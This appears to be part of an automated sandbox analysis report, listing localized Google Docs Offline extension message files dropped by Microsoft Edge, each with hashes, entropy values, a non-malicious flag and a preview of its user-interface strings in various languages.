                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                                    MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                                    SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                                    SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                                    SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1658
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                                    MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                                    SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                                    SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                                    SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1672
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                                    MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                                    SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                                    SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                                    SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):935
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                                    MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                                    SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                                    SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                                    SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1065
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                                    MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                                    SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                                    SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                                    SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2771
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                                    MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                                    SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                                    SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                                    SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):858
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                                    MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                                    SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                                    SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                                    SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):954
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                                    MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                                    SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                                    SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                                    SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):899
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                                    MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                                    SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                                    SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                                    SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2230
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                                    MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                                    SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                                    SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                                    SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1160
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                                    MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                                    SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                                    SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                                    SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):3264
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                                    MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                                    SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                                    SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                                    SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):3235
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                                    MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                                    SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                                    SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                                    SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):3122
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                                    MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                                    SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                                    SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                                    SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                                    Malicious:false
